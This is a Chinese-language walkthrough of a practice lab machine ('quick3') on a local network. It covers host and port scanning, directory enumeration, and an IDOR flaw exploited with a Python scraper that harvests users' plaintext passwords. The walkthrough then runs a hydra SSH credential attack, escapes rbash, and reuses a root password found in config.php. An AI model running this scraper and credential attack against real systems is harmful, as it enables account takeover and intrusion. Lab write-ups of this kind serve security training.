kali:192.168.56.104

主机发现

arp-scan -l

# arp-scan -l 
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:05       (Unknown: locally administered)
192.168.56.100  08:00:27:ca:cc:72       PCS Systemtechnik GmbH
192.168.56.113  08:00:27:28:12:35       PCS Systemtechnik GmbH

靶机:192.168.56.113

端口扫描

nmap -p- -A 192.168.56.113

# nmap -p- -A 192.168.56.113
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-04 17:52 CST
Nmap scan report for 192.168.56.113
Host is up (0.00044s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 2e:7a:1f:17:57:44:6f:7f:f9:ce:ab:a1:4f:cd:c7:19 (ECDSA)
|_  256 93:7e:d6:c9:03:5b:a1:ee:1d:54:d0:f0:27:0f:13:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Quick Automative - Home
|_http-server-header: Apache/2.4.52 (Ubuntu)
MAC Address: 08:00:27:28:12:35 (Oracle VirtualBox virtual NIC)

开启了22 80 端口

目录扫描

gobuster dir -u http://192.168.56.113 -x html,txt,php,zip,bak --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

/index.html           (Status: 200) [Size: 51414]
/images               (Status: 301) [Size: 317] [--> http://192.168.56.113/images/]
/img                  (Status: 301) [Size: 314] [--> http://192.168.56.113/img/]
/modules              (Status: 301) [Size: 318] [--> http://192.168.56.113/modules/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.113/css/]
/lib                  (Status: 301) [Size: 314] [--> http://192.168.56.113/lib/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.113/js/]
/customer             (Status: 301) [Size: 319] [--> http://192.168.56.113/customer/]
/404.html             (Status: 200) [Size: 5013]
/fonts                (Status: 301) [Size: 316] [--> http://192.168.56.113/fonts/]

customer界面是一个注册界面

注册个账号进入1@qq.com/1

在myprofile里面发现可以修改密码，并且原密码只是单纯的被遮盖，在源码里可以看到

更关键的是，在url中修改id可以直接读取其他用户的密码

爬虫爬一下用户名密码

import requests
from bs4 import BeautifulSoup

session = requests.Session()
session.cookies.update({"PHPSESSID": "i507lvgtnbd3a9ugi6thbvqir5"})

for id in range(1, 30):
    response = session.get(f"http://192.168.56.113/customer/user.php?id={id}")
    soup = BeautifulSoup(response.content, "lxml")
    username = soup.select("ul.list-unstyled")[1]
    username_parts = username.text.strip().split(":")[1].strip().split("@")
    if len(username_parts) == 2:
        username, domain = username_parts
        if domain == "quick.hmv":
            password = soup.find("input", id="oldpassword")["value"]
            print(f"{username}:{password}")

info:q27QAO6FeisAAtbW
nick.greenhorn:H01n8X0fiiBhsNbI
andrew.speed:oyS6518WQxGK8rmk
mike.cooper:6G3UCx6aH6UYvJ6m
jeff.anderson:Kn4tLAPWDbFK9Zv2
coos.busters:8RMVrdd82n5ymc4Z
juan.mecanico:DX5cM3yFg6wJgdYb
john.smith:yT9Hy2fhX7VhmEkj
lara.johnson:GUFTV4ERd7QAexxw

处理一下，用姓作为username

info:q27QAO6FeisAAtbW
nick:H01n8X0fiiBhsNbI
andrew:oyS6518WQxGK8rmk
mike:6G3UCx6aH6UYvJ6m
jeff:Kn4tLAPWDbFK9Zv2
coos:8RMVrdd82n5ymc4Z
juan:DX5cM3yFg6wJgdYb
john:yT9Hy2fhX7VhmEkj
lara:GUFTV4ERd7QAexxw

hydra爆破一下

# hydra -C user.txt 192.168.56.113 ssh             
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-04 18:29:10
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries, ~1 try per task
[DATA] attacking ssh://192.168.56.113:22/
[22][ssh] host: 192.168.56.113   login: mike   password: 6G3UCx6aH6UYvJ6m
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-03-04 18:29:15

mike/6G3UCx6aH6UYvJ6m

ssh连接拿到user权限

mike@quick3:~$ ls -al
total 36
drwxr-x---  4 mike mike 4096 Jan 24 12:56 .
drwxr-xr-x 11 root root 4096 Jan 24 10:38 ..
lrwxrwxrwx  1 mike mike    9 Jan 24 10:46 .bash_history -> /dev/null
-rw-r--r--  1 mike mike  220 Jan 21 13:57 .bash_logout
-rw-r--r--  1 mike mike 3797 Jan 24 12:56 .bashrc
drwx------  2 mike mike 4096 Jan 21 14:00 .cache
drwxrwxr-x  3 mike mike 4096 Jan 21 13:58 .local
-rw-r--r--  1 mike mike  807 Jan 21 13:57 .profile
-rw-rw-r--  1 mike mike 4166 Jan 21 13:58 user.txt

mike@quick3:~$ cd ..
-rbash: cd: restricted

发现shell是rbash,输入bash拿到正常shell

然后就是翻文件，在customer里面的配置文件里面有root的密码

mike@quick3:/var/www/html/customer$ cat config.php
<?php
// config.php
$conn = new mysqli('localhost', 'root', 'fastandquicktobefaster', 'quick');

// Check connection
if ($conn->connect_error) {
        die("Connection failed: " . $conn->connect_error);
}
?>

成功登录root拿到flag

总结:越权，爬虫，配置文件